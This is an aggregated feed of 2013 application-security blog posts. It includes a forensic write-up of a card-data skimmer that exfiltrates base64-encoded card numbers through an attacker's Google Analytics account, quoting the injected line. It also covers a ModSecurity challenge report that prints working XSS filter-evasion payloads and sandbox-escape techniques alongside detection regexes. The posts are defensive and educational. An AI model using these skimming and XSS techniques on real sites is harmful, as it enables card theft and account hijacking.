Shared posts

05 Nov 14:40

How To Start With Software Security – Part 2

by Ray Sinnema

white-hatLast time, I wrote about how an organization can get started with software security.

Today I will look at how to do that as an individual.

From Development To Secure Development

As a developer, I wasn’t always aware of the security implications of my actions.

Now that I’m the Engineering Security Champion for my project, I have to be.

It wasn’t an easy transition. The security field is vast and I keep learning something new almost every day. I read a number of books on security, some of which I reviewed on this site.

As an aspiring software craftsman, I realize that personal efforts are only half the story. The other half is the community of professionals.

Secure Development Communities

I’m lucky to work in a big organization, where such a community already exist.

EMC’s Product Security Office (PSO) provides me with a personal security adviser, maintains a security-related wiki, and operates a space on our internal collaboration environment.

communityIf your organization doesn’t have something like our PSO, you can look elsewhere. (And if it does, you should look outside too!)

OWASP is a great place to start.

They actually have three sub-communities, one of which is for Builders.

But it’s also good to look at the other sub-communities, since they’re all related. Looking at things from the perspective of the others can be quite enlightening.

That’s also why it’s a good idea to attend a security conference, if you can. OWASP holds annual AppSec conferences in three geos. The RSA Conference is another good place to meet your peers.

If you can’t afford to attend a conference, you can always follow the security section of Stack Exchange or watch SecurityTube.

Contributing To The Community

So far I’ve talked about taking in information, but you shouldn’t forget to share your personal experiences as well.

contributeYou may think you know very little yet, but even then it’s valuable to share.

It helps to organize your thoughts, which is crucial when learning and you may find you’ll gain insights from comments that readers leave as well.

More to the point, there are many others out there that are getting started and who would benefit from seeing they are not alone.

Apart from posting to this blog, I also contribute to the EMC Developer Network, where I’m currently writing a series on XML and Security.

There are other ways to contribute as well. You could join or start an OWASP chapter, for instance.

What Do You Think?

How did you get started with software security? How do you keep up with the field? What communities are you part of? Please leave a comment.


Filed under: Application Security, Information Security, Software Development Tagged: AppSec, blog, Builders, community, EDN, EMC, OWASP, RSA Conference, security, SecurityTube, software craftsmanship, Stack Exchange, XML
29 Oct 18:23

Steve Lipner – The Security Development Lifecycle at Microsoft

by Trusted Software Alliance
“I think we have a long way to go to get the broad understanding of what security really means in …

Continue reading »

29 Oct 16:15

John Steven – Measuring the Cost of Application Security

by Trusted Software Alliance
“If you take the big, monolithic testing effort you currently have at the end, and you push it towards the …

Continue reading »

23 Oct 20:09

Card Data Siphon with Google Analytics

by Richard Wells

The introduction of EMV (Chip & Pin) payment devices in 2003 resulted in a rapid decline in physical credit card cloning in Europe. EMV technology has also led to an increase in attacks on e-commerce systems targeting cardholder data.

Each year, Trustwave SpiderLabs investigates hundreds of incidents of data compromise. I work on some of these investigations and occasionally get to evaluate some rather unusual attack vectors. This blog post details a novel data extraction technique using Google Analytics that I found during a recent investigation. We have evidence of this technique being used in the wild. For the purposes of this article, however, I have replicated the attack in a test environment.

Once an attacker accesses an e-commerce system, their next step is locating cardholder data. In most of my investigations, I see attackers either download stored credit card data or modify source code to capture data as it passes through the system and then send it back to their own system. In this particular case, the merchant did not store credit card information. As a result, the attackers captured the data as it entered the system and then siphoned it to their own system.

We see many forms of real-time capturing of credit card data. In the majority of cases, attackers change a payment page’s source code to send the data to an e-mail address, a different server via POST requests, or a storage file for later collection. These techniques rely on the merchant’s server sending the data outbound or storing it internally, which could be detected by network monitoring.

In this case, whilst reviewing the source code for the merchant’s payment pages, I noticed that a line had been added at the bottom of the page. That line of code appeared to collect data entered into the credit card fields in a base64 encoded string:

1

At this point, I’d expect to see the php variable ‘$a’ being sent to a malicious IP address but couldn’t find any evidence of this. After further review of the source code, I found the variable ‘$a’ being referenced in the following piece of code:

2

This modified source code instructs the customer’s browser to send the string ‘$a’ – which contains a customer’s base64 encoded credit card data - to Google Analytics via JavaScript. The attacker had replaced merchant’s Google Analytics account ID to his own - ‘UA-00000000-1’. The other line added, _gaq.push(['_set', 'page', '".$a."']), passed the base64 encoded string ‘$a’ to Google Analytics as a page name variable.

Even the most savvy of customers, those who monitor their HTTP requests, could fail to identify this malicious activity. The base64 encoded string is not displayed on the page, and the outbound request is sent to the trusted Google brand. The requests do not seem out of the ordinary as the merchant’s website already used Google Analytics.

With these modifications in place, the attackers can sit back and let the credit cards roll in. Once a week they can log-in to their Google Analytics accounts and harvest cardholder data via the base64 encoded page names.

After discovering this innovative use of Google’s JavaScript to extract credit card data, I wanted to test this independently. To demonstrate, I setup my own Google Analytics account and created base64 encoded strings similar to:

Original: Richard|Wells|4111111111111111|1234|123|ITWORKS
Base64:UmljaGFyZHxXZWxsc3w0MTExMTExMTExMTExMTExfDEyMzR8MTIzfElUV09SS1M=

These strings were then sent from a website to my Analytics account, using hacked JavaScript. Once I logged-in to Google Analytics I was presented with the following screen:

2


The truncated string in the ‘Page’ field can be found in full within the Google Analytics source code:

3
Decoding the string provides me with the original message, or in the case of our attackers – the credit card details. My next question was, “While the extraction method works, what can be seen from the client side?”.

The browser just shows a Google Analytics request, posting a base64 string, which wouldn’t look out of place on most websites.
Firebug - Google analytics posting bas64 -blanked

It is interesting to note that at no point in this process did I have to verify with Google that I was the owner of the webpage. This is a potential issue that could be resolved by only allowing one registered Analytics user per domain.

Using Google Analytics to extract credit card data is stealthy as no data is directly passed from the server and will not appear in web logs. Neither will anti-virus detect it. The best methods to defend against these sorts of attacks are File Integrity Monitoring and alerting for any changes made to the source code. Setting appropriate read-only permissions for the web users would also help to defend against real-time capture of credit cards.

23 Oct 20:08

Simon Bennetts – The OWASP Web Applications Vulnerability Project

by Trusted Software Alliance
In this morning’s news I saw a reference to a project on OWASP that documents the vulnerabilities in web applications …

Continue reading »

23 Oct 20:07

A Default Base of XSS

by Mike
Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode mislead developers about what was really being made “safe” and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough […]
23 Oct 20:04

Securing Source Code Building Servers in the SDLC – Talking Code Part 8

by Cobhan Phillipson

Talking Code episode 8 is here and it’s question time for Paul Roberts, Chris Wysopal and Joshua Corman. This week’s discussion centers around securing source code build servers in the SDLC – an issue that concerns both supply chain and operational security.

Every week we will be releasing another webisode of Talking Code but if you want to watch the whole series, simply fill out the form at this link and get watching!

15 Oct 19:54

Application-Layer Denial of Service Attacks

We often hear about infrastructure denial of service (DoS) attacks, but traditionally there has not been much data available on application-layer DoS.

One of the charts from the Q2 2013 DDos Attack Report

The Prolexic Distributed DoS (DDos) attack reports includes a comprehensive analysis of data from their own networks. Application-layer attacks against their clients accounted for 25% of attacks, with the remainder against infrastructure (OSI layers 3 and 4). For the infrastructure attacks, SYN floods accounted for almost half of all attacks (the report's text says 31.22 of infrastructure, but the data in Figure 3 suggests it is 31.22 of all attacks).

The number of attacks has risen by a third, but it is not clear whether this is due to the company having more clients, or because the were more attacks against each client. The points I found of most interest:

  • Compromised web servers are now the preferred method of attack, not a botnet of home PCs
  • An average attacks lasts less than two days
  • The average bandwidth is almost 50 Gbps, but half are less than 5Gbps, and a fifth are less than 1Gbps
  • GET floods account for the majority of application-layer DDoS attacks
  • Many low-volume attacks are easy to launch without significant skill
  • Amplification attacks where the attacker spoofs their identity to be that of the ultimate target and are sent to intermediary victim servers, are favoured due to the additional impact and source obfuscation.

The reports are free to download after registration.

See also previous posts on Denial of Service Attack Defences and Distributed Denial of Service Attacks.

Application-Layer Denial of Service Attacks

Clerkendweller

14 Oct 17:25

The Projects Summit 2013 is happening: GET INVOLVED!!!!

by Dinis Cruz
Here is the announcement email from Samantha Groves sent to the OWASP Leaders list:

    Hello Leaders,

    This message is just to get the conversation started. I was in the AppSec USA planning meeting yesterday, and everyone on the call was thrilled with what we are doing! They are very excited to see this happen so we need to get moving on some of these items. First up, is sorting out what the working sessions will be, then I can get a tentative schedule sorted for us. Here are the tentative Track and Session topics: https://www.owasp.org/index.php/Projects_Summit_2013


    Projects Track - Project Reviews Session: Johanna Curiel Leading

    ESAPI Hackathon: Chris and Kevin, as I told Simon, feel free to change everything that is on the working session pages. I just put that information on there based on what we had discussed earlier. Please feel free to be creative with what you want to do. What would benefit the project most? Reach out to me if you have questions. 

    University Outreach, Education and Training: Martin and Kostas... Same as I told Simon, Chris, and Kevin. The template is there, now it is just up to you if/what you want to do. 

    Writing, Proofreading, and Technical Editing: Michael Hidalgo is taking this on. Michael, feel free to edit these as you wish. The only vision I have for this session is that we should proofread and edit a handfull of our new guides/project books. We can do that there or before. Call me if you want to talk about this more. 

    Product Development and Reference Implementation: These sessions still need a leader. If no one is interested in them, we can drop them and replace them with something else. 

    Zap Hackathon: You know what to do, Simon.

    New Addition: Jack Mannino is in for the Summit. He is doing a Mobile Security session. 

    Session Leaders, have a think about what day you want to have the sessions you are leading take place. 

    For all OWASP Leaders: There is opportunity to change everything right now so reach out to us if you want to participate in any of the sessions above, or if you have ideas for other tracks and sessions. 

    Reach out to me if you have questions: I am always here. ;-)

    Thank you, Leaders.

    SG

So, if you have an OWASP Project that you are currently using or leading/contributing, then this is the place to be involved.

And as with the last Summits (at this stage of planning), there is still plenty of time and space to add more Working Sessions, so if you have ideas (or want to lead one), then create a new Working Session and add it to: https://www.owasp.org/index.php/Projects_Summit_2013
14 Oct 02:45

OWASP Top 10 – A1 Injection « Le Blog d'Ippon Technologies

Description. The attacker sends untrusted data that will be injected in the targeted application to change its behaviour. The goal of this attack is usually to steal ...
08 Oct 20:55

Attention, CISOs: Strategy is the only security

OWASP Guide project leader Marco Morana outlines ideal application security strategies
07 Oct 13:18

Jack Mannino – Build Security into Mobile

by Trusted Software Alliance
“Enterprise security has actually become dependant upon how we can identify people at the mobile layer.” — Jack Mannino When …

Continue reading »

07 Oct 13:17

DOM-Based Cross Site Scripting

A new paper describes problems caused by the insecure handling of untrusted data through JavaScript from attacker-controlled sources, such as the document.location property, into security sensitive DOM components of an HTML page.

Partial image of a page from the paper '25 Million Flows Later - Large-scale Detection of DOM-based XSS'

Sebastian Lekies, Ben Stock and Martin Johns present an automated method to detect DOM-based cross site scripting (XSS) vulnerabilities in their paper 25 Million Flows Later - Large-scale Detection of DOM-based XSS.

The paper describes a taint-tracking approach for detection, an automated vulnerability validation mechanism and a the results of a study examining over half a million pages from the Alexa top 5000 websites.

The results? Well, read the paper. Then go and fix your site!

DOM-Based Cross Site Scripting

Clerkendweller

07 Oct 13:14

OWASP Mobile Security Project | Information Security 101

If you've ever talked infosec with me, you've no doubt noticed that I love the OWASP Top 10 Project. Every few years, they update their list of the 10 most ...
01 Oct 19:50

2013 OWASP Top 10 - SlideShare

2013 OWASP Top 10 presentation, slightly modified for a presentation I did at the Lasso Developer Conference in Niagara Falls.
30 Sep 16:47

Joe Jarzombek – Security is not just about Software

by Trusted Software Alliance
“Some of the common weaknesses are not at the code level. Over 2/3 are at the code level, but the …

Continue reading »

30 Sep 16:46

Scaling Web Security - JavaOne Security Talk

by Michael Coates
This week I spoke at JavaOne on scaling web security programs. It was a great event and I enjoyed the chance to speak to a great crowd of developers and security individuals.

Presentation below. Enjoy.





-Michael Coates - @_mwc
30 Sep 16:46

Java Tainted Strings

by Dinis Cruz
At AppSec EU Steven van der Baan approached me with the great idea of seeing if we could do an open source implementation of Java Tainted Strings.

The idea is to (somehow) add metadata to the java.lang.String object and allow an App (or APIs) to taint a string (i.e. mark it as 'potentially malicious') and to modify that App/API's behaviour based on tainted information (for example "don't execute an SQL statement if its sql command string is tainted")

There is still a lot of thinking that needs to happen on this idea, and we are currently in the 'pre PoC' stage.

Me and Steven are going to try to document our ideas, and here are the first two from him:

It starts with an idea



Where to start



Please let us know of your ideas, or other good resources/thinking on this

For example are a couple interesting documents I quickly found by searching for 'Java tainted strings' on google:




30 Sep 05:37

OWASP ASVS for Web Applications 2013 Beta Release

OWASP's less well known, but immensely useful, Application Security Verification Standard (ASVS) for web applications has been updated and a beta version was released just prior to AppSec EU last month.

Diagram from the OWASP ASVS Web Application Standard 2013 showing the four different web application security verification levels

The ASVS Web Application Standard 2013 defines a set of technical controls for applications that should be verified as part of security testing processes. They are primarily application controls but also include relevant ones in the host environment. The document describes three use cases — for application certification, for alignment of testing methodology and for selection of external suppliers.

The number of classes requirements has been expanded to 13, and now covers:

  • Authentication
  • Session management
  • Access control
  • Input validation
  • Cryptography at rest
  • Error handling and logging
  • Data protection
  • Communications
  • HTTP
  • Malicious controls
  • Business logic
  • Files and resources
  • Mobile.

Each class includes around 10-20 specific requirements. The new sections, and re-allocation of some requirements means that the numbering has changed significantly. The cross-referencing will be important for those already using the ASVS Web Application Standard 2009.

Not all the requirements need to be achieved for every application. The choice can clearly be organisation-specific, based on its own risk assessment, but the document describes four levels of verification, each successive level increasing the number of mandatory requirements.

The project team, primarily Andrew van der Stock, Sahba Kazerooni, Daniel Cuthbert, and Krishna Raja, are working on gathering feedback from the community, creating use-case examples, and mapping to other OWASP projects such as the upcoming new Developer and Testing Guides.

Please help by providing your own ideas to finalise the beta release via the project's mailing list.

OWASP ASVS for Web Applications 2013 Beta Release

Clerkendweller

26 Sep 00:14

OWASP Foundation: New York Times CTO; Senior Executives from ...

NEW YORK, Sept. 24, 2013 /PRNewswire-USNewswire/ -- OWASP AppSec USA (www.appsecusa.org), the premier security conference for Builders, Breakers ...
25 Sep 17:17

Moderated Application Security News Feed from OWASP

by Michael Coates
OWASP's moderated application security news feed has returned! We have a new RSS link so please
update your RSS readers with the new information.

The Feed: http://feeds.feedblitz.com/OWASP
Syndicated on twitter: @OWASP_feed

Know of a good application security blog that should be included? Please submit it for consideration here. Lastly, OWASP is free and open so if you're curious how the AppSecNews feed is run then check out the details here.

Many thanks to Jeff Williams for running the AppSecNews feed for the first 8 years. Thanks also to Jim Manico and Sarah Baso for investigating various platforms to restart the new AppSecNews feed!


-Michael Coates - @_mwc
24 Sep 23:08

Guidelines of OWASP

by Dinis Cruz
OWASP got a great quote on this EU Regulations document which is aimed at laying down technical specifications for online collection systems pursuant to Regulation (EU) No 211/2011 of the European Parliament and of the Council on the citizens’ initiative)



Do a search for OWASP and you find 2 references, with the 2nd being this one:


This is great, but what are these 'Guidelines of OWASP'?

Ideally we should should have a series for very explicit and focused 'Guidelines' to answer this question :)

To kickstart this process I created the Guidelines of OWASP page at the OWASP Wiki, so if you have some cycles, please chip in with your views:


24 Sep 03:36

AppSecEU Research 2013 Part 2

... Continued from Part 1. As usual with these types of events, in AppSecEU 2013 I had already missed a number of talks on other tracks on fascinating and useful topics by great presenters.

Photograph taken during OWASP AppSec EU Research 2013 showing Roberto Suggi Liverani presenting

I continued the first day by listening to Roberto Suggi Liverani discuss using browser automation frameworks and web proxy APIs to assist the assessment of client-side applications. He demonstrated the use of an extension for Burp Suite called the CSJ extension that combines the use of Crawljax JUnit and Selenium web driver. [video]

Photograph taken during OWASP AppSec EU Research 2013 showing a view of Hamburg taken from the conference venue

With the unfortunate absence of Gareth Heyes, Erlend Oftedal stepped in to provide a presentation about implementing and testing RESTful web services. He described common difficulties such as session timeout, third party authentication, anti CSRF tokens, cryptography, access control, replay attacks, and XML attacks. He presented a series of recommendations to avoid common pitfalls. [video]

Photograph taken during OWASP AppSec EU Research 2013 showing a flip chart used during one of the Open Source Showcase discussions

Throughout both conference days an open source security showcase was running, with each project having a dedicated room and expert available for discussion, assistance and hands-on demonstration. These proved to be very popular due to the quality of the topics and facilitators.

Florian Stahl and Johannes Stroeher jointly presented a methodical approach for texting mobile applications that included information gathering, threat modelling, enumeration, code and component review and dynamic testing. [video]

Photograph taken during OWASP AppSec EU Research 2013 of one of the break-out areas

Two locations were provided for refreshment and food breaks, one on each conference level. These were heavily used by the delegates and were also where there was an opportunity to meet with the various conference sponsors and other supporters.

To conclude the first day, I listened to the final talk on the HackPra track by the track's enigmatic co-organiser Mario Heiderich. He discussed XSS attacks and how it is normally possible to bypass any form of filtering, especially when there are bugs in the web browsers themselves, unless strict whitelist approach is utilised. He reiterated that it is important to be extremely wary of user-generated CSS. [video]

On the Thursday evening, we were treated to the conference dinner on board the museum cargo ship Cap San Diego. And some beers. Pre-dinner drinks were available on the deck, dinner was on two levels within the extensive cargo hold, and there was an opportunity to have a guided tour of the vessel afterwards with one of the former sailors.

Photograph taken during OWASP AppSec EU Research 2013

Continues in Part 3...

AppSecEU Research 2013 Part 2

Clerkendweller

23 Sep 17:58

ModSecurity XSS Evasion Challenge Results

by Ryan Barnett

On July 30th, we announced our public ModSecurity XSS Evasion Challenge.  This blog post will provide an overview of the challenge and results.

Value of Community Testing

First of all, I would like to thank all those people that participated in the challenge.  All told, we had > 730 participants (based on unique IP addresses) which is a tremendous turn out.  This type of community testing has helped to both validate the strengths and expose the weaknesses of the XSS blacklist filter protections of the OWASP ModSecurity Core Rule Set Project.  The end result of this challenge is that the XSS Injection rules within the CRS have been updated within the Trunk release in GitHub.

XSS Evasion Challenge Setup

The form on this page is vulnerable to reflected XSS. Data passed within the test parameter (either GET or POST) will be reflected back to this same page without any output encoding/escaping.

XSS Defense #1: Inbound Blacklist Regex Filters

We activated updated XSS filters from the OWASP ModSecurity Core Rule Set (CRS).  When clients send attack payloads, they are evaluated by the CRS rules and then the detection scores are popagated to the HTML form as such: 

CRS XSS Anomaly Score Exceeded (score 10): NoScript XSS InjectionChecker: HTML Injection

We added XSS filter regular expressions from the following 3rd party sources:

XSS Defense #2: JS Sandbox Injection

image from businessinfo.co.ukThis defensive layer uses ModSecurity's Data Modification capability (@rsub operator) to dynamically insert Gareth Heyes' (@garethheyes) JS Sandbox called MentalJS to the beginning of html responses.
It is important to understand what a JS sandbox is and how it works. You may be able to execute JS code however it is in a sandboxed environment. For example - preventing a JS alert popup box is not the goal here but rather protecting DOM elements from being accessed.

In some cases, MentalJS prevents the injected code from executing at all.  In other cases, the code will execute, however it does so from within a JS sandbox.  The result is that the code is not able to access DOM elements outside of the sandbox.  For instance, if an injection attempts to access document.cookie, it returns data as "undefined" -

Screen Shot 2013-09-16 at 2.43.48 PM

Challenge Goals

The challenge was twofold and to win the participants needed to develop a single payload that achieved both of these goals:

1. Filter Evasion

You must execute a reflected XSS attack accessing one of the DOM elements listed below WITHOUT triggering an XSS filter alert.  Example -

No CRS XSS Filter Alerts Triggered (score 0)

Depending on the payload, you may need to review the raw HTML to verify the CRS score.

2. Escape from the MentalJS JavaScript Sandbox

You must bypass the MentalJS JS Sandbox protections and successfully execute a reflected XSS attack that executes JS code in your browser. A successful attack will be able to access one of the following DOM elements:
  1. Trigger the youWon JS function
  2. Access document.location that is not undefined or sandboxed
  3. Access document.cookie that is not undefined or sandboxed

Example -

image from npercoco.typepad.com
You may toggle On/Off the defenses by checking the box in the form below. This includes disable the MentalJS Sandbox injection and also will add the X-XSS-Protection: 0 response header to temporarily disable any browser side XSS filtering. This will help to facilitate testing of working XSS payloads.

Challenge Results

While various community submissions did include bypasses for each of the two protection layers individually, there were no official winners who were able to bypass BOTH the CRS filters and break out of the MentalJS sandbox all within a single payload.  That being said, we do want to highlight the individual component bypasses as they still have value for the community.

OWASP CRS Filter Evasions

Evasion #1 - Nul Bytes inside Script Tags

Security Researcher Rafay Baloch actually was a bit ahead of the curve on this challenge as he notified us of a bypass using Nul Bytes within the JS script tag name just prior to the XSS Evasion Challenge being publicly announced. 

Screen Shot 2013-09-17 at 3.11.39 PM

He was testing our public Smoke Test page here.

Evasion #1 - Lesson Learned

Screen Shot 2013-09-17 at 3.15.43 PM

Evasion #1 - Analysis

As you can see from the output, rule ID 960901 triggered and was specifically designed to flag the presence of Nul Bytes.  We took this approach rather than attempting to deal with Nul Bytes within every remaining rule.  That being said, there is still a valid point here - if a Nul Byte can be used to obfuscate payloads and evade detections then this should be addressed specifically.

If we research Gareth Heyes' Shazzer online fuzzer info, we find that indeed IE v9 allows the use of Nul Bytes within the script tag name -

Screen Shot 2013-09-17 at 3.34.17 PM
The JSON export API shows the example vector payloads -

Screen Shot 2013-09-17 at 3.36.29 PM
So, by adding %00 within the script tag name, many of the XSS regular expression checks would not match and IE9 would still parse the tag correct and execute javascript... Perfect.  

Evasion #1 - Lesson Learned

Strip Nul Bytes

To combat this tactic, we added the "t:removeNulls" transformation function action to our XSS filters:

Screen Shot 2013-09-18 at 2.15.28 PM

Test Shazzer Fuzz Payloads

This Nul Byte issue demonstrates just one different is browser parsing quirks.  There are many, many others...  It is for this reason that we decided for regression testing of XSS filters we needed to leverage the Shazzer dataset to identify payloads that trigger JS across multiple browser types and versions.  I created a number of ruby scripts that interact with the Shazzer API that can extract successful fuzz payloads and test them against the live XSS evasion challenge page running the latest OWASP ModSecurity CRS rules.

Screen Shot 2013-09-18 at 3.27.35 PM

Evasion #2 - Non-space Separators

Again Rafay Baloch sent in a submission that used this technique -

http://www.modsecurity.org/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E&disable_xss_defense=on&disable_browser_xss_defense=on

Screen Shot 2013-09-18 at 4.50.38 PM
We also received a similar submission from ONsec_lab:

http://www.modsecurity.org/demo/demo-deny-noescape.html?test=%3Cinput+onfocus%0B%3Dalert%281%29%3E&disable_xss_defense=on&disable_browser_xss_defense=on

image from pbs.twimg.com

Evasion #2 - Analysis

There are a number of characters that browsers will treat as "spaces" characters.  Here is a table of these characters for each browser type:

IExplorer = [0x09,0x0B,0x0C,0x20,0x3B]
Chrome = [0x09,0x20,0x28,0x2C,0x3B]
Safari = [0x2C,0x3B]
FireFox = [0x09,0x20,0x28,0x2C,0x3B]
Opera = [0x09,0x20,0x2C,0x3B]
Android = [0x09,0x20,0x28,0x2C,0x3B]

The evasion method used by both of these submissions was to place one of the characters in between the "onevent" name attribute (such as onmouseover and onfocus) and the equal sign (=) character -

  • onmouseover%0B=
  • onfocus%0B%3D

As you can see from the table above, Internet Explorer (IE) would treat the %0B character as a space and parse/execute the payload however it would bypass blacklist regular expression filters such as this -

(?i)([\s\"'`;\/0-9\=]+on\w+\s*=)

Screen Shot 2013-09-18 at 5.22.21 PM
The problem with this regex is the use of the "\s" meta-character where %0B is not within the class.

Evasion #2 - Lesson Learned

Similar to the Evasion #1 - we can utilize Shazzer Fuzz DB data to obtain payloads with these non-space chars separating on-event handlers

Screen Shot 2013-09-18 at 5.40.53 PM

We modified our regex rules to catch these non-space characters:

Screen Shot 2013-09-18 at 5.48.30 PM

Here is what the updatd regex visual looks like:

Screen Shot 2013-09-18 at 5.49.59 PM

We then ran our ruby scripts to extract and test this Shazzer Fuzz data against our rules to verify that they were caught:

Screen Shot 2013-09-18 at 5.43.02 PM

MentalJS Escaping

The second half of the challenge was to try and escape from the MentalJS sandbox and access the DOM elements.  There were a few people who were successful.  Remember, however, that while these payloads were able to break out of the MentalJS sandbox they were all caught by the regular expression filters.

Breaking the MentalJS Parser

The most interesting MentalJS bypass submission was from Roman Shafigullin which included a method of breaking the parser.  My analyzing the JS, he found that he could break the parsing by setting an emply script tag:

Screen Shot 2013-09-19 at 3.16.42 PM
With this as the payload, it then brok this section of the MentalJS parsing:

Screen Shot 2013-09-19 at 3.18.30 PM
He was then able to set the "src" attribute to anything he wanted and chose to pull in a JS file hosted from his own server:

Screen Shot 2013-09-19 at 3.20.22 PM
When resulting full payload returned the following:

Mentaljs

Resetting document.body.innerHTML

 

Guiseppe Trotta sent in the first succesful submission.

Screen Shot 2013-09-19 at 1.27.24 PM
Here were the payloads he used -

Screen Shot 2013-09-19 at 1.28.51 PM
There were others who submitted similar payloads that used document.body.innerHTML to override the MentalJS sandboxing-

  • Nicholas Mavis
  • Rafay Baloch

DOM Events Missing from Sandbox

There are a few DOM events that are not covered within the current version of MentalJS including:

  • expression:
  • background:url(javascript:...)
  • detachEvent
These were also reported by Vladimir Vorontsov in the sla.ckers.org forum.

Conclusions

Ok, so in this conclusion section, I am going to hit you with some Earth-shattering revelations!  No, not really.  What I will cover here, however is information that re-enforces security themes you have heard before with relevant attack testing data.

Attack-Driven Testing Is Essential

Trust, but Verify - Ronald Reagan.

Our rules are of a high quality because they have been field tested by the community.  Only when top-tier web app pentesters focus some QA effort on the rules will they become better.  It is through these types of public, community hacking challenges that we are able to strenthen our rules.  The question is - what are other WAF vendors doing to test their rules???

Blacklist Filtering Alone Is Not Enough 

Negative security models used on their own is not enough to prevent a determined attacker.  It is only a matter of time before they are able to identify an evasion method.  While this is true, negative security models do still have value:

  • They easily block the bulk of attacks.  We received more than 8,400 attacks during the challenge and only a couple were successful in bypassing the filters.
  • They force attackers to use manual testing.  If an attacker wants to bypass good negative security filters, they must be willing to use their own skills and expertise to develop a bypass.  Most of these evasions are not present within testing tools.  This increases resistance time to allow security personnel to respond.
  • They help to categorize attacks.  Without negative security filters, injection attacks would not be able to be labeled and would reside within a generic "parameter manipulation" event from violations of input validation rules.  With negative security model, you can put attacks into groups for XSS, SQL Injection, Remote File Inclusion, etc...

Beyond Regular Expressions

There are many other methods of detecting malicious payloads besides regular expressions.  Some other examples are:

  • Bayesian Analysis - this helps by identifying attack payload liklihood rather than the binary yes or no of regular expressions.  See this blog post for example Bayesian analysis.  When running these payloads against our Bayesian analysis rules, they were flagged:
Screen Shot 2013-09-20 at 9.36.26 AM

Security in Layers (server-side/client-side)

The combination of server-side blacklist filtering and client-side javascript challenge proved to be extremely effective.  While some submissions were successful in evading the filters, they were not able to break out of the MentalJS sandbox.  On the flip side, those submissions that were able to break out of the MentalJS sandbox, were not able to evade the filters.  Use multple different methods of identifying attacks to increase coverage and to compensate for weaknesses in other layers.

23 Sep 01:31

AppSecEU Research 2013 Part 1

I have been unable to make time to write up my notes from AppSecEU 2013 until today. Apologies for the delay, but I hope they are still of use. I have included links to the high-resolution videos of each talk mentioned which were published immediately after the event.

Photograph taken during OWASP AppSec EU Research 2013 showing the evening event held at Hamburg City Beach Club

The schedule had looked very enticing, and I had some ideas about what I would listen to and participate in. I arrived in Hamburg late on Wednesday afternoon just as the training courses were ending for the day. It seems the training had been a huge success with 120 attendees. After a quick refresh, I headed down to the Hamburg City Beach Club where OWASP had arranged a place for trainees, trainers, conference delegates, speakers and organisers to meet, network and socialise. It seems that apart from a real working port, Hamburg also has a sandy beach. It was a good place to catch up with friends, colleagues and a few new contacts, and have some beers.

On Thursday morning, the conference began with a welcome from Dirk Wetter, Conference Chair for the event. He welcomed the 400 delegates and explained arrangements, the layout of the split-level conference (on floor levels -2 and +23), and some special tips about not inadvertently activating the fire detection systems.

Photograph taken during OWASP AppSec EU Research 2013 showing Angela Sasse giving the conference keynote

The first keynote, provided by Angela Sasse, was a brilliant start to the conference. Angela described how software designers can make a huge difference to security by not trying to force users to change their behaviour. She suggested a top ten list of why users don't follow security advice, and concluded that designers must respect users time and effort, since complexity is the enemy. As an example she used the example of authentication where the objective should be "012": zero effort, one step, two factor. She finished here presentation with the suggestion that "Security measures that waste users' time" should be considered for inclusion in the OWASP Top Ten Web Application Security Risks. [video]

PHotograph taken during OWASP AppSec EU Research 2013 showing Michael Coates and Sarah Baso from OWASP

Following this, the Michael Coates, chair of the OWASP Board and Sarah Baso, Executive Director, provided an introduction to OWASP and how volunteering adds value to the community, the individuals themselves and their employers. Everything OWASP produces is free and open. It currently has 198 local chapters in 140 countries, with 36,000 mailing list participants. It is referenced by scores of government and industry standards, guidance and codes of practice. Sarah went on to describe current initiatives, described the sources of income and expenses and announced the candidates for this year's board elections. She also explained there would be an OWASP Project Leaders' workshop the following day first thing in the morning. [video]

Jörg Schwenk provided the second keynote on the topic of cryptography in web applications. He discussed a number of misconceptions and why for example signing and encrypting cookies do not help. [video]

Photograph taken during OWASP AppSec EU Research 2013 showing Michael Orru' presenting inter protocol exploitation

After the first break of the day, I joined the HackPra Track to hear Michele Orru', co-maintainer of the BeEF project, explain how web vulnerabilities can be used to directly exploit other protocols such as IMAP, SMTP, POP, SIP and IRC using just HTTP requests. Strange but true.[video]

Photograph taken during OWASP AppSec EU Research 2013 showing Paul Stone presenting Precision Timing

Paul Stone described the previously fixed browser CSS history attacks and went on to explain and demonstrate how it is possible to use the Window.requestAnimationFrame() method in a timing attack to determine the contents of pages by examining the source code pixel-by-pixel. Not only did Paul provide a very clear explanation of the method, he illustrated how the attack was optimised in a series of incremental steps to increase confidence in the results and speed up the determination of textual content. He demonstrated how it was possible to extract credentials included in the source code of a page from another domain for example. [video]

Photograph taken during OWASP AppSec EU Research 2013 showing Nicholas Grégoire

After the extensive buffet lunch, I listed to Nicholas Grégoire speaking about tips and tricks for those who use the HTML proxy Burp Suite Pro. He discussed visualisation of XML and AMF data and extensions for JSON and JavaScript, GUI navigation, contextual buttons, hot keys, history sorting, custom payloads, managing state, the curlit extension, custom iterators, and using Burp with mobile devices. [video]

Continues in Part 2...

AppSecEU Research 2013 Part 1

Clerkendweller

19 Sep 10:00

Understanding (and testing for) view state MAC in ASP.NET web forms

by Troy Hunt

Remember view state? For that matter, do you even remember web forms?! I kid because although MVC is the new hotness in the world of building ASP.NET websites, web forms remains the predominant framework due to both the very long tail of sites already built on it and the prevalence of developers with skills in this area who haven’t made the transition to MVC (indeed some people argue that they can happily cohabit, but that’s another discussion for another day).

Anyway, back to view state. When we entered the world of .NET more than a decade ago now, view state was the smoke and mirrors that turned that stateless HTTP protocol into something that actually persisted data across requests entirely automagically. If, like me, you’d come from a classic ASP world you would have been used to a lot of plumbing going into passing data between requests and manually binding it back up to HTML controls to create the veneer of persistence. View state also made for a much lower friction transition process for folks moving from a win forms world where these problems of persistence didn’t exist like they do in the web world. Ok, it could get out of control very quickly and many people bemoaned the (often hefty) overhead it could put on page and request sizes, but it served it a purpose.

